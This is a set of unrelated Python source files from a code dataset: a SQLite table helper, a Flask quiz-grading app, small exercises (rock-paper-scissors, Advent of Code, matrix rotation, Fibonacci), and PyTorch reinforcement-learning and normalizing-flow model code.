for i in range(len(values))])\n\n query = 'INSERT OR REPLACE INTO {table} ({cols}) \\\n VALUES({placeholder})'.format(\n table=self._table_name,\n cols=','.join(columns),\n placeholder=placeholders)\n self._queued_to_save = True\n return self._conn.execute(query, values).lastrowid\n\n def check_table(self):\n ''' Check if table exist, if not, create it '''\n if not self._table_exists():\n self._create_table()\n\n def column_type(self, column_name):\n '''get the type of a collun'''\n if column_name in self._columns.keys():\n return self._columns[column_name]['type']\n return None\n\n def get_last_rowid(self):\n ''' Get the last ROWID of the primary key of the table'''\n query = 'SELECT seq FROM sqlite_sequence WHERE name=?'\n return self._conn.execute(query, [self._table_name]).fetchone()[0]\n\n def _table_exists(self):\n ''' Check if this table exist in database '''\n query = 'SELECT name FROM sqlite_master WHERE type=\"table\" AND name=?'\n return self._conn.execute(query, [self._table_name]).fetchone()\\\n is not None\n\n def _create_table(self):\n ''' Create this table if not exists '''\n columns_def = ''\n foreigh = ''\n for key, value in self._columns.items(): # COLDEF\n # columname datatype primary key (columns)\n ctype = self._type_convert(value['type'])\n constraint = ''\n if key in self._primary:\n constraint += ' primary key'\n if value['default'] in ['AUTO', 'AUTOINCREMENT']:\n constraint += ' AUTOINCREMENT'\n else:\n constraint += ' DEFAULT {v1}'.format(v1=(\n str(value['default']) if value['type'] is not str\n else '\"{v}\"'.format(v=value['default'])\n ))\n columns_def += key + ' ' + ctype + constraint + ', '\n\n for key, value in self._foreigh_keys.items():\n # FOREIGN KEY(trackartist) REFERENCES artist(artistid)\n table, column = value.split('.', 2)\n foreigh += ', FOREIGN KEY({_key}) \\\n REFERENCES {_table}({_column}), '.format(\n _key=key,\n _table=table,\n _column=column)\n query = 'CREATE TABLE \\\n IF NOT EXISTS {table} ({coldef} {foreigh}) '.format(\n table=self._table_name,\n coldef=columns_def[:-2],\n foreigh=foreigh[:-2])\n cursor = self._conn.cursor()\n cursor.execute(query)\n self._conn.commit()\n\n def get_columns_name(self):\n ''' return columns names '''\n return self._columns.keys()\n\n def _type_convert(self, ctype):\n ''' Convert python type to sqlite type '''\n ctypes = {\n 'INTEGER': [int],\n 'BOOLEAN': [bool],\n 'REAL': [float],\n 'TEXT': [str, datetime],\n 'BLOB': [bytes]\n }\n for sqlite_type, python_types in ctypes.items():\n if ctype in python_types:\n return sqlite_type\n return 'BLOB'\n\n def _select_query(self, query):\n ''' assemble the select query '''\n where_stmt = []\n values = []\n for key, value in query.items():\n if key in self._columns.keys():\n where_stmt.append(key + ' = ? ')\n values.append(value)\n else:\n raise Exception('The column ' + cname + ' is not found.')\n nquery = 'SELECT {cols} FROM {table} {where}'.format(\n cols=\", \".join(self._columns.keys()),\n table=self._table_name,\n where='WHERE ' + ' AND '.join(where_stmt) if len(\n where_stmt) else '')\n return self._conn.execute(nquery, values)\n","sub_path":"core/dbtable.py","file_name":"dbtable.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"505781569","text":"# -*- coding: utf-8 -*-\nfrom flask import render_template, redirect, url_for, flash, request, abort, session\nfrom flask_login import current_user, login_required, current_app, login_user\nfrom . 
import exam\nimport pymysql\n\n'''\nquestion_list——选择题\njudge_list——判断题\nfill_list——填空题\n\nwrong_list——错误的选择题\nwrong_judge_list——错误的判断题\nwrong_fill_list——错误的填空题\n'''\n\n@exam.route('/', methods=['GET', 'POST'])\ndef index():\n # return render_template('index.html')\n id=1\n return redirect(url_for('.exam_page', id=id))\n\n# 选出考试题目\n@exam.route('/exam_page&id=', methods=['GET'])\ndef exam_page(id):\n # id = 5\n db = pymysql.connect('localhost', 'root', '970306', 'net_lesson', charset='utf8')\n cur = db.cursor()\n sql_choice = 'SELECT Question, Choice_a, Choice_b, Choice_c, Choice_d, Answer ' \\\n 'FROM choice_problems WHERE Lesson_id = %s ORDER BY rand() LIMIT 3;'\n sql_judge = 'SELECT Question, Answer FROM judge_problems ' \\\n 'WHERE Lesson_id = %s ORDER BY rand() LIMIT 2;'\n sql_fill = 'SELECT Question, Answer FROM fill_problems ' \\\n 'WHERE Lesson_id = %s ORDER BY rand() LIMIT 2;'\n\n cur.execute(sql_choice, (id))\n questions = cur.fetchall()\n\n question_list = []\n for question in questions:\n question_list.append(list(question))\n\n cur.execute(sql_judge, (id))\n questions = cur.fetchall()\n\n judge_list = []\n for question in questions:\n judge_list.append(list(question))\n\n cur.execute(sql_fill, (id))\n questions = cur.fetchall()\n\n fill_list = []\n for question in questions:\n fill_list.append(list(question))\n\n cur.close()\n db.close()\n session['question_list'] = question_list\n session['judge_list'] = judge_list\n session['fill_list'] = fill_list\n return render_template('exam.html', question_list=question_list,\n judge_list=judge_list, fill_list=fill_list)\n\n# 计算测试成绩\n@exam.route('/answer', methods=['POST'])\ndef answer():\n if request.method == \"POST\":\n # reply_list = []\n # for i in range(4):\n # reply_list.append(request.values.get('question' + str(i)))\n correct = 0 #计算正确的题目\n # 错误题目列表\n wrong_list = []\n wrong_judge_list = []\n wrong_fill_list = []\n\n # 选择题\n for i in range(len(session['question_list'])):\n # 判断单选题\n if len(session['question_list'][i][-1]) == 1:\n reply = request.values.get('question' + str(i))\n # 判断多选题正确与否\n else:\n reply_list = request.values.getlist('question' + str(i))\n reply = ''\n for re in reply_list:\n reply += re\n if session['question_list'][i][-1] == reply:\n correct += 1\n else:\n session['question_list'][i].append(reply)\n wrong_list.append(session['question_list'][i])\n\n # 判断题\n for i in range(len(session['judge_list'])):\n reply = request.values.get('judge' + str(i))\n if session['judge_list'][i][-1] == reply:\n correct += 1\n else:\n session['judge_list'][i].append(reply)\n wrong_judge_list.append(session['judge_list'][i])\n\n\n for i in range(len(session['fill_list'])):\n reply = request.values.get('fill' + str(i))\n if session['fill_list'][i][-1] == reply:\n correct += 1\n else:\n session['fill_list'][i].append(reply)\n wrong_fill_list.append(session['fill_list'][i])\n\n\n # score = correct / 4.0 * 100.0\n score = 50\n session.pop('question_list', None)\n session.pop('judge_list', None)\n session.pop('fill_list', None)\n # session['wrong_list'] = wrong_list\n # session['wrong_judge_list'] = wrong_judge_list\n # session['wrong_fill_list'] = wrong_fill_list\n # return render_template('answer.html', score=score)\n return render_template('review.html', score=score, wrong_list=wrong_list,\n wrong_judge_list=wrong_judge_list,\n wrong_fill_list=wrong_fill_list)\n\n# @exam.route('/review', methods=['POST'])\n# def review():\n# return render_template('review.html', wrong_list=session['wrong_list'],\n# 
wrong_judge_list=session['wrong_judge_list'],\n# wrong_fill_list=session['wrong_fill_list'])\n","sub_path":"app/exam/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"640456842","text":"from random import randrange\nnahodne_cislo = randrange (3)\ntah_hrac = input (\"zadej 'kamen', 'nuzky' nebo 'papir':\")\nwhile tah_hrac != \"konec\":\n while (tah_hrac != \"kamen\") and (tah_hrac != \"nuzky\") and (tah_hrac != \"papir\") and (tah_hrac != \"konec\"):\n print (\"sptane zadane, zkuste znova\")\n tah_hrac = input (\"zadej 'kamen', 'nuzky' nebo 'papir':\")\n\n\n\n\n#prirazeni kamen, nuzky nebo papir promenne tah_pocitac pomoci nahodneho cisla\n if nahodne_cislo == 0:\n tah_pocitac = \"kamen\"\n elif nahodne_cislo == 1:\n tah_pocitac = \"nuzky\"\n elif nahodne_cislo == 2:\n tah_pocitac = \"papir\"\n else:\n print (\"chyba v urceni nahodneho cisla\")\n print (\"pocitac vybral\", tah_pocitac)\n\n if ((tah_pocitac == \"kamen\" and tah_hrac == \"nuzky\") or (tah_pocitac == \"nuzky\"\\\n and tah_hrac == \"papir\") or (tah_pocitac == \"papir\" and tah_hrac == \"kamen\")):\n print (\"prohrals\")\n elif ((tah_pocitac == \"kamen\" and tah_hrac == \"papir\") or (tah_pocitac == \"nuzky\" and tah_hrac == \"kamen\") or (tah_pocitac == \"papir\" and tah_hrac == \"nuzky\")):\n print (\"vyhrals\")\n\n elif ((tah_pocitac == \"kamen\" and tah_hrac == \"kamen\") or (tah_pocitac == \"nuzky\" and tah_hrac == \"nuzky\") or (tah_pocitac == \"papir\" and tah_hrac == \"papir\")):\n print (\"plichta\")\n\n tah_hrac = input (\"zadej 'kamen', 'nuzky' nebo 'papir':\")\nprint (\"konec hry\")\n\n\nprint (\"diky za hru\")\n","sub_path":"05_ukoly/kamen.py","file_name":"kamen.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"588015046","text":"#!/usr/bin/env pypy3\n\n\"\"\"\n--- Day 17: Conway Cubes ---\nAs your flight slowly drifts through the sky, the Elves at the Mythical Information Bureau at the North Pole contact you. They'd like some help debugging a malfunctioning experimental energy source aboard one of their super-secret imaging satellites.\n\nThe experimental energy source is based on cutting-edge technology: a set of Conway Cubes contained in a pocket dimension! When you hear it's having problems, you can't help but agree to take a look.\n\nThe pocket dimension contains an infinite 3-dimensional grid. At every integer 3-dimensional coordinate (x,y,z), there exists a single cube which is either active or inactive.\n\nIn the initial state of the pocket dimension, almost all cubes start inactive. The only exception to this is a small flat region of cubes (your puzzle input); the cubes in this region start in the specified active (#) or inactive (.) state.\n\nThe energy source then proceeds to boot up by executing six cycles.\n\nEach cube only ever considers its neighbors: any of the 26 other cubes where any of their coordinates differ by at most 1. For example, given the cube at x=1,y=2,z=3, its neighbors include the cube at x=2,y=2,z=2, the cube at x=0,y=2,z=3, and so on.\n\nDuring a cycle, all cubes simultaneously change their state according to the following rules:\n\nIf a cube is active and exactly 2 or 3 of its neighbors are also active, the cube remains active. Otherwise, the cube becomes inactive.\nIf a cube is inactive but exactly 3 of its neighbors are active, the cube becomes active. 
Otherwise, the cube remains inactive.\nThe engineers responsible for this experimental energy source would like you to simulate the pocket dimension and determine what the configuration of cubes should be at the end of the six-cycle boot process.\n\nFor example, consider the following initial state:\n\n.#.\n..#\n###\nEven though the pocket dimension is 3-dimensional, this initial state represents a small 2-dimensional slice of it. (In particular, this initial state defines a 3x3x1 region of the 3-dimensional space.)\n\nSimulating a few cycles from this initial state produces the following configurations, where the result of each cycle is shown layer-by-layer at each given z coordinate (and the frame of view follows the active cells in each cycle):\n\nBefore any cycles:\n\nz=0\n.#.\n..#\n###\n\n\nAfter 1 cycle:\n\nz=-1\n#..\n..#\n.#.\n\nz=0\n#.#\n.##\n.#.\n\nz=1\n#..\n..#\n.#.\n\n\nAfter 2 cycles:\n\nz=-2\n.....\n.....\n..#..\n.....\n.....\n\nz=-1\n..#..\n.#..#\n....#\n.#...\n.....\n\nz=0\n##...\n##...\n#....\n....#\n.###.\n\nz=1\n..#..\n.#..#\n....#\n.#...\n.....\n\nz=2\n.....\n.....\n..#..\n.....\n.....\n\n\nAfter 3 cycles:\n\nz=-2\n.......\n.......\n..##...\n..###..\n.......\n.......\n.......\n\nz=-1\n..#....\n...#...\n#......\n.....##\n.#...#.\n..#.#..\n...#...\n\nz=0\n...#...\n.......\n#......\n.......\n.....##\n.##.#..\n...#...\n\nz=1\n..#....\n...#...\n#......\n.....##\n.#...#.\n..#.#..\n...#...\n\nz=2\n.......\n.......\n..##...\n..###..\n.......\n.......\n.......\nAfter the full six-cycle boot process completes, 112 cubes are left in the active state.\n\nStarting with your given initial configuration, simulate six cycles. How many cubes are left in the active state after the sixth cycle?\n\"\"\"\n\ndef remove( f, x, y, z ):\n if z not in f:\n return\n if y not in f[z]:\n return\n if x in f[z][y]:\n f[z][y].pop(x)\n if not f[z][y]:\n f[z].pop(y)\n if not f[z]:\n f.pop(z)\n\ndef add( f, x, y, z ):\n if z not in f:\n f[z] = {}\n if y not in f[z]:\n f[z][y] = {}\n f[z][y][x] = True\n\ndef get( f, x, y, z ):\n if z not in f:\n return False\n if y not in f[z]:\n return False\n return f[z][y].get(x, False)\n\ndef neighbors( f, x, y, z ):\n n = 0\n for dx in [-1, 0, 1]:\n for dy in [-1, 0, 1]:\n for dz in [-1, 0, 1]:\n if dx == dy == dz == 0:\n continue\n if get( f, x + dx, y + dy, z + dz ):\n n += 1\n return n\n \ndef evolve( f ):\n cf = {}\n minz, maxz = min( f.keys() ), max( f.keys() )\n miny, maxy, minx, maxx = 0, 0, 0, 0\n for z in f:\n miny, maxy = min( miny, *f[z].keys() ), max( maxy, *f[z].keys() )\n for y in f[z]:\n minx, maxx = min( minx, *f[z][y].keys() ), max( maxx, *f[z][y].keys() )\n for z in range(minz - 1, maxz + 2):\n for y in range(miny - 1, maxy + 2):\n for x in range(minx - 1, maxx + 2):\n if get( f, x, y, z ):\n n = neighbors( f, x, y, z )\n if n == 2 or n == 3:\n add( cf, x, y, z )\n else:\n if neighbors( f, x, y, z ) == 3:\n add( cf, x, y, z )\n return cf\n \n\ndef count( f ):\n c = 0\n for z in f:\n for y in f[z]:\n for x in f[z][y]:\n if f[z][y][x]:\n c += 1\n return c\n\ndata = []\n\nwith open(\"17.data\", \"r\") as f:\n for line in f:\n data.append(line.strip())\n\nf = {}\nfor y in range(len(data)):\n for x in range(len(data[y])):\n if data[y][x] == \"#\":\n add( f, x, y, 0 )\n\nfor i in range(6):\n f = evolve(f)\n\nprint(count(f))\n","sub_path":"adventofcode/2020/17a.py","file_name":"17a.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"128805338","text":"def 
turnLeft(lista,n): #左轉\n newtest = [[0] *n for i in range(n)] #陣列初始化 \n for i in range(n):\n for j in range(n):\n newtest[n-j-1][i] = lista[i][j]\n return newtest #回傳旋轉後結果\ndef turnUpAndDown(lista,n): #上下翻轉\n newtest = [[0] *n for i in range(n)] ##陣列初始化 \n newtest[:] = lista[::-1]\n return newtest #回傳旋轉後結果\ndef turnRight(lista,n): #右轉\n newtest = [[0] *n for i in range(n)] #陣列初始化\n for i in range(n):\n for j in range(n):\n newtest[j][n-i-1] = lista[i][j]\n return newtest #回傳旋轉後結果\ndef prinList(newtest,n): #印出最後結果\n for i in range(n):\n for j in range(n):\n print(newtest[i][j],sep=\"\",end=\" \")\n print()\ndef checkStatus(lista,turndata,n): #確認狀態\n for i in turndata:\n if(i=='L'):\n lista = turnLeft(lista,n)\n elif(i=='R'):\n lista = turnRight(lista,n)\n elif(i=='N'):\n lista = turnUpAndDown(lista,n)\n elif(i=='F'):\n prinList(lista,n)\ndef main():\n n = int(input()) #輸入N值\n turndata = [i for i in input().split()] #輸入 L R N旋轉\n data=1\n lista = [[] *n for i in range(n)] #創建n*n矩陣 #創建new n*n矩陣\n for i in range(n):\n for j in range(n):\n lista[i].append(data)\n data+=1\n checkStatus(lista,turndata,n)\nmain()","sub_path":"week3/Transfer.py","file_name":"Transfer.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"305856923","text":"def fibo():\n length_sequence = int(input(\"Input the length of the sequence: \"))\n sum=0\n num1=0\n num2=1\n\n print(\"Fibonacci Sequence:\")\n print(\"-------------------\")\n print(0)\n for i in range(0, length_sequence - 1):\n# fibonacci is the last two sums = to the new sum\n num1=num2\n num2=sum\n sum=num1+num2\n print(sum)\n\ndef abuntant():\n max_number = int(input(\"Input the max number to check: \"))\n sum1 = 0\n\n print(\"Abundant numbers:\")\n print(\"-----------------\")\n for i in range(1, max_number + 1):\n for p in range(1, i):\n if i % p == 0: # if the number that we are checking(i) is divisible p\n sum1 = sum1 + p\n if sum1 > i:\n print(i)\n sum1 = 0 #set the sum1 variable back to 0 for the next number\n\n\nchoice = input(\"Input f|a|b (fibonacci, abundant or both): \")\n\nif choice == \"f\":\n fibo()\nelif choice == \"a\":\n abuntant()\nelif choice == \"b\":\n fibo()\n\n abuntant()","sub_path":"fibo_abundant.py","file_name":"fibo_abundant.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"125234811","text":"\"\"\"This file is just for test purpose.\n\"\"\"\n\nfrom custom_logger import SksLogger\n\n# print(SksLogger.__doc__, \"\\n\")\n# print()\n\nlogger = SksLogger()\nlogger.set_log_name('sksdata-logs')\nlogger.set_log_level_threshold_name('INFO')\n\nlog_message = \"log entry 1\"\n\nlogger.fetch_logs(logger.log_name)\nprint()\n\n# logger.default(log_message)\n# logger.debug(log_message)\n# logger.info(log_message)\n# logger.notice(log_message)\n# logger.warning(log_message)\n# logger.error(log_message)\n# logger.critical(log_message)\n# logger.alert(log_message)\n# logger.emergency(log_message\n\n# wait for logs to pushed, before reading updated logs\n# import time; time.sleep(7)\n\n# print()\n# logger.fetch_logs(logger.log_name)\n\n# print()\n# #filter logs by level name\n# level_name = 'INFO'\n# logger.filter_logs_by_level_name(logger.log_name, level_name)\n\n# print()\n# search_key = 'entry 8'\n# logger.search_in_logs(logger.log_name, search_key)\n# print()\n# search_key = '2019-07-06'\n# logger.search_in_logs(logger.log_name, search_key, 
log_entry_field = 'timestamp')\n# print()\n\n# print(\"\\nclearing log entries ...\")\n# logger.clear_logs(logger.log_name)\n\n# # read logs from multipe projects\n# PROJECT_IDS = [\"cp-sksdata-dev\", \"another-project\"]\n# logger.fetch_logs_from_multiple_projects(PROJECT_IDS)\n","sub_path":"test_logger.py","file_name":"test_logger.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"199159136","text":"import numpy as np\nimport scipy.signal\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions.normal import Normal\nimport torch.distributions as D\nimport os\nimport math\nimport argparse\nimport pprint\nimport copy\n\n\ndevice = torch.device(\"cpu\")\ndef combined_shape(length, shape=None):\n if shape is None:\n return (length,)\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\ndef mlp(sizes, activation, output_activation=nn.Identity):\n layers = []\n for j in range(len(sizes)-1):\n act = activation if j < len(sizes)-2 else output_activation\n layers += [nn.Linear(sizes[j], sizes[j+1]), act()]\n return nn.Sequential(*layers)\n\ndef count_vars(module):\n return sum([np.prod(p.shape) for p in module.parameters()])\n\n\nLOG_STD_MAX = 2\nLOG_STD_MIN = -20\n\nclass SquashedGaussianMLPActor(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation, act_limit):\n super().__init__()\n self.net = mlp([obs_dim] + list(hidden_sizes), activation, activation)\n self.mu_layer = nn.Linear(hidden_sizes[-1], act_dim)\n self.log_std_layer = nn.Linear(hidden_sizes[-1], act_dim)\n self.act_limit = act_limit\n\n def forward(self, obs, deterministic=False, with_logprob=True):\n net_out = self.net(obs)\n mu = self.mu_layer(net_out)\n log_std = self.log_std_layer(net_out)\n log_std = torch.clamp(log_std, LOG_STD_MIN, LOG_STD_MAX)\n std = torch.exp(log_std)\n\n # Pre-squash distribution and sample\n pi_distribution = Normal(mu, std)\n if deterministic:\n # Only used for evaluating policy at test time.\n pi_action = mu\n else:\n pi_action = pi_distribution.rsample()\n\n if with_logprob:\n # Compute logprob from Gaussian, and then apply correction for Tanh squashing.\n # NOTE: The correction formula is a little bit magic. To get an understanding \n # of where it comes from, check out the original SAC paper (arXiv 1801.01290) \n # and look in appendix C. This is a more numerically-stable equivalent to Eq 21.\n # Try deriving it yourself as a (very difficult) exercise. 
:)\n logp_pi = pi_distribution.log_prob(pi_action).sum(axis=-1)\n logp_pi -= (2*(np.log(2) - pi_action - F.softplus(-2*pi_action))).sum(axis=1)\n else:\n logp_pi = None\n\n pi_action = torch.tanh(pi_action)\n pi_action = self.act_limit * pi_action\n\n return pi_action, logp_pi\n\n def get_logprob(self,obs, actions):\n net_out = self.net(obs)\n mu = self.mu_layer(net_out)\n log_std = self.log_std_layer(net_out)\n log_std = torch.clamp(log_std, LOG_STD_MIN, LOG_STD_MAX)\n std = torch.exp(log_std)\n pi_distribution = Normal(mu, std)\n logp_pi = pi_distribution.log_prob(actions).sum(axis=-1)\n logp_pi -= (2*(np.log(2) - actions - F.softplus(-2*actions))).sum(axis=1)\n\n return logp_pi\n\n\n\n\nclass awacMLPActor(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation, act_limit):\n super().__init__()\n self.net = mlp([obs_dim] + list(hidden_sizes), activation, activation)\n self.mu_layer = nn.Linear(hidden_sizes[-1], act_dim)\n\n self.log_std_logits = nn.Parameter(\n torch.zeros(act_dim, requires_grad=True))\n self.min_log_std = -6\n self.max_log_std = 0\n # self.log_std_layer = nn.Linear(hidden_sizes[-1], act_dim)\n self.act_limit = act_limit\n\n def forward(self, obs, deterministic=False, with_logprob=True):\n # print(\"Using the special policy\")\n net_out = self.net(obs)\n mu = self.mu_layer(net_out)\n mu = torch.tanh(mu) * self.act_limit\n\n log_std = torch.sigmoid(self.log_std_logits)\n \n log_std = self.min_log_std + log_std * (\n self.max_log_std - self.min_log_std)\n std = torch.exp(log_std)\n # print(\"Std: {}\".format(std))\n\n # Pre-squash distribution and sample\n pi_distribution = Normal(mu, std)\n if deterministic:\n # Only used for evaluating policy at test time.\n pi_action = mu\n else:\n pi_action = pi_distribution.rsample()\n\n if with_logprob:\n # Compute logprob from Gaussian, and then apply correction for Tanh squashing.\n # NOTE: The correction formula is a little bit magic. To get an understanding \n # of where it comes from, check out the original SAC paper (arXiv 1801.01290) \n # and look in appendix C. This is a more numerically-stable equivalent to Eq 21.\n # Try deriving it yourself as a (very difficult) exercise. 
:)\n logp_pi = pi_distribution.log_prob(pi_action).sum(axis=-1)\n # logp_pi -= (2*(np.log(2) - pi_action - F.softplus(-2*pi_action))).sum(axis=1)\n else:\n logp_pi = None\n\n\n return pi_action, logp_pi\n\n def get_logprob(self,obs, actions):\n net_out = self.net(obs)\n mu = self.mu_layer(net_out)\n mu = torch.tanh(mu) * self.act_limit\n log_std = torch.sigmoid(self.log_std_logits)\n # log_std = self.log_std_layer(net_out)\n log_std = self.min_log_std + log_std * (\n self.max_log_std - self.min_log_std)\n std = torch.exp(log_std)\n pi_distribution = Normal(mu, std)\n logp_pi = pi_distribution.log_prob(actions).sum(axis=-1)\n\n return logp_pi\n\n\n\n\nclass MLPVFunction(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n self.v = mlp([obs_dim] + list(hidden_sizes) + [1], activation)\n\n def forward(self, obs):\n v = self.v(obs)\n return torch.squeeze(v, -1) # Critical to ensure q has right shape.\n\nclass MLPQFunction(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n self.q = mlp([obs_dim + act_dim] + list(hidden_sizes) + [1], activation)\n\n def forward(self, obs, act):\n q = self.q(torch.cat([obs, act], dim=-1))\n return torch.squeeze(q, -1) # Critical to ensure q has right shape.\n\nclass MLPActorCritic(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=(256,256),\n activation=nn.ReLU, special_policy=None):\n super().__init__()\n\n obs_dim = observation_space.shape[0]\n act_dim = action_space.shape[0]\n act_limit = action_space.high[0]\n # build policy and value functions\n if special_policy is 'awac':\n self.pi = awacMLPActor(obs_dim, act_dim, (256,256,256,256), activation, act_limit).to(device)\n else:\n self.pi = SquashedGaussianMLPActor(obs_dim, act_dim, hidden_sizes, activation, act_limit).to(device)\n self.q1 = MLPQFunction(obs_dim, act_dim, hidden_sizes, activation).to(device)\n self.q2 = MLPQFunction(obs_dim, act_dim, hidden_sizes, activation).to(device)\n self.v = MLPVFunction(obs_dim, act_dim, hidden_sizes, activation).to(device)\n\n\n def act_batch(self, obs, deterministic=False):\n with torch.no_grad():\n a, _ = self.pi(obs, deterministic, False)\n return a\n\n def act(self, obs, deterministic=False):\n with torch.no_grad():\n a, _ = self.pi(obs, deterministic, False)\n return a.cpu().data.numpy().flatten()\n\n\n\n\n\n# --------------------\n# Density estimator\n# Model layers and helpers\n# --------------------\n\ndef create_masks(input_size, hidden_size, n_hidden, input_order='sequential', input_degrees=None):\n # MADE paper sec 4:\n # degrees of connections between layers -- ensure at most in_degree - 1 connections\n degrees = []\n\n # set input degrees to what is provided in args (the flipped order of the previous layer in a stack of mades);\n # else init input degrees based on strategy in input_order (sequential or random)\n if input_order == 'sequential':\n degrees += [torch.arange(input_size)] if input_degrees is None else [input_degrees]\n for _ in range(n_hidden + 1):\n degrees += [torch.arange(hidden_size) % (input_size - 1)]\n degrees += [torch.arange(input_size) % input_size - 1] if input_degrees is None else [input_degrees % input_size - 1]\n\n elif input_order == 'random':\n degrees += [torch.randperm(input_size)] if input_degrees is None else [input_degrees]\n for _ in range(n_hidden + 1):\n min_prev_degree = min(degrees[-1].min().item(), input_size - 1)\n degrees += [torch.randint(min_prev_degree, input_size, (hidden_size,))]\n 
min_prev_degree = min(degrees[-1].min().item(), input_size - 1)\n degrees += [torch.randint(min_prev_degree, input_size, (input_size,)) - 1] if input_degrees is None else [input_degrees - 1]\n\n # construct masks\n masks = []\n for (d0, d1) in zip(degrees[:-1], degrees[1:]):\n masks += [(d1.unsqueeze(-1) >= d0.unsqueeze(0)).float()]\n\n return masks, degrees[0]\n\n\nclass MaskedLinear(nn.Linear):\n \"\"\" MADE building block layer \"\"\"\n def __init__(self, input_size, n_outputs, mask, cond_label_size=None):\n super().__init__(input_size, n_outputs)\n\n self.register_buffer('mask', mask)\n\n self.cond_label_size = cond_label_size\n if cond_label_size is not None:\n self.cond_weight = nn.Parameter(torch.rand(n_outputs, cond_label_size) / math.sqrt(cond_label_size))\n\n def forward(self, x, y=None):\n out = F.linear(x, self.weight * self.mask, self.bias)\n if y is not None:\n out = out + F.linear(y, self.cond_weight)\n return out\n\n def extra_repr(self):\n return 'in_features={}, out_features={}, bias={}'.format(\n self.in_features, self.out_features, self.bias is not None\n ) + (self.cond_label_size != None) * ', cond_features={}'.format(self.cond_label_size)\n\n\nclass MADE(nn.Module):\n def __init__(self, input_size, hidden_size, n_hidden, cond_label_size=None, activation='relu', input_order='sequential', input_degrees=None):\n \"\"\"\n Args:\n input_size -- scalar; dim of inputs\n hidden_size -- scalar; dim of hidden layers\n n_hidden -- scalar; number of hidden layers\n activation -- str; activation function to use\n input_order -- str or tensor; variable order for creating the autoregressive masks (sequential|random)\n or the order flipped from the previous layer in a stack of mades\n conditional -- bool; whether model is conditional\n \"\"\"\n super().__init__()\n # base distribution for calculation of log prob under the model\n self.register_buffer('base_dist_mean', torch.zeros(input_size))\n self.register_buffer('base_dist_var', torch.ones(input_size))\n\n # create masks\n masks, self.input_degrees = create_masks(input_size, hidden_size, n_hidden, input_order, input_degrees)\n\n # setup activation\n if activation == 'relu':\n activation_fn = nn.ReLU()\n elif activation == 'tanh':\n activation_fn = nn.Tanh()\n else:\n raise ValueError('Check activation function.')\n\n # construct model\n self.net_input = MaskedLinear(input_size, hidden_size, masks[0], cond_label_size)\n self.net = []\n for m in masks[1:-1]:\n self.net += [activation_fn, MaskedLinear(hidden_size, hidden_size, m)]\n self.net += [activation_fn, MaskedLinear(hidden_size, 2 * input_size, masks[-1].repeat(2,1))]\n self.net = nn.Sequential(*self.net)\n\n @property\n def base_dist(self):\n return D.Normal(self.base_dist_mean, self.base_dist_var)\n\n def forward(self, x, y=None):\n # MAF eq 4 -- return mean and log std\n m, loga = self.net(self.net_input(x, y)).chunk(chunks=2, dim=1)\n u = (x - m) * torch.exp(-loga)\n # MAF eq 5\n log_abs_det_jacobian = - loga\n return u, log_abs_det_jacobian\n\n def inverse(self, u, y=None, sum_log_abs_det_jacobians=None):\n # MAF eq 3\n D = u.shape[1]\n x = torch.zeros_like(u)\n # run through reverse model\n for i in self.input_degrees:\n m, loga = self.net(self.net_input(x, y)).chunk(chunks=2, dim=1)\n x[:,i] = u[:,i] * torch.exp(loga[:,i]) + m[:,i]\n log_abs_det_jacobian = loga\n return x, log_abs_det_jacobian\n\n def log_prob(self, x, y=None):\n u, log_abs_det_jacobian = self.forward(x, y)\n return torch.sum(self.base_dist.log_prob(u) + log_abs_det_jacobian, 
dim=1)","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":12697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"579922840","text":"import rutermextract\nfrom resources import keywords\n\n\nclass PyMorpho:\n def __init__(self):\n self.termex = rutermextract.TermExtractor()\n self.true_keywords = keywords.final\n\n def generate_keywords_list(self, raw_text_data, limit, frequency):\n \"\"\" Generate keywords list from string\n term.normalized - keyword in text\n term.count - quantity of keyword in text\n \"\"\"\n keyword_count_dict = {}\n keywords = []\n\n for term in self.termex(raw_text_data, limit=limit):\n keyword_count_dict[term.normalized] = term.count\n\n for keyword, count in keyword_count_dict.items():\n if count > frequency:\n keywords.append(keyword)\n\n return keywords\n\n def format_user_keywords(self, user_keywords):\n return set(user_keywords) & set(self.true_keywords)\n\n def get_keywords_from_groups(self, groups, limit=40, frequency=2):\n \"\"\" Generate keywords list according to user groups \"\"\"\n preprocess_text_data = \"\"\n keyword_count_dict = {}\n user_groups_keywords = []\n for group in groups:\n try:\n preprocess_text_data += group['description'] + group['name']\n except Exception:\n pass\n\n for term in self.termex(preprocess_text_data, limit=limit):\n keyword_count_dict[term.normalized] = term.count\n\n for keyword, count in keyword_count_dict.items():\n if count > frequency:\n user_groups_keywords.append(keyword)\n\n return user_groups_keywords\n","sub_path":"keyword_extractor/PyMorpho.py","file_name":"PyMorpho.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"540596684","text":"\"\"\"empty message\n\nRevision ID: ef97ccd20ae6\nRevises: 7d5703fb9531\nCreate Date: 